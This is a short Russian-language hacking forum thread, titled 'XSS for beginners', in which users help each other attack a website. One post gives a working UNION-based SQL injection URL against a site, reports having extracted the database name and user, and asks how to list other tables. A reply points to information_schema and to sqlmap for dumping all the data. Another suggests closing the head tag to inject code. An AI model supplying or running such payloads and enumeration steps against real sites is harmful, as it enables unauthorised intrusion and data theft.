Xss для новичков

Обсуждение в разделе «Избранное», начал(-а) Micr0b, 4.06.2006.

  1. kranx

    kranx New Member

    Регистрация:
    19.02.2017
    Сообщения:
    17
    Одобрения:
    6
    Репутация:
    0
    ну так посмотри в коде что там происходит
     
  2. pastword

    pastword New Member

    Регистрация:
    19.02.2017
    Сообщения:
    16
    Одобрения:
    0
    Репутация:
    0
    Есть XSS:
    site.dn/topic.php?SECTION_ID=22%27+uNiOn+SeLecT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+;&ID=35&UPPER_ID=
    колонка №9 выводится на стр. с помощью чего получил ответы на database() и user(). Как узнать имена других таблиц и колонок?
    Кавычки не фильтруются.
    без Blind никак?
     
    #62 pastword, 8.03.2017
    В последний раз редактировалось: 8.03.2017
  3. kranx

    kranx New Member

    Регистрация:
    19.02.2017
    Сообщения:
    17
    Одобрения:
    6
    Репутация:
    0
    information_schema если mysql. sqlmap чтобы быстро получить все данные.
    это бля не XSS а SQL Injection
     
  4. {iddqd}

    {iddqd} Member

    Регистрация:
    22.12.2011
    Сообщения:
    159
    Одобрения:
    63
    Репутация:
    2
    закрой тег </head>
    напиши новый
    <head>
    тут код
    </head>
     
Загрузка...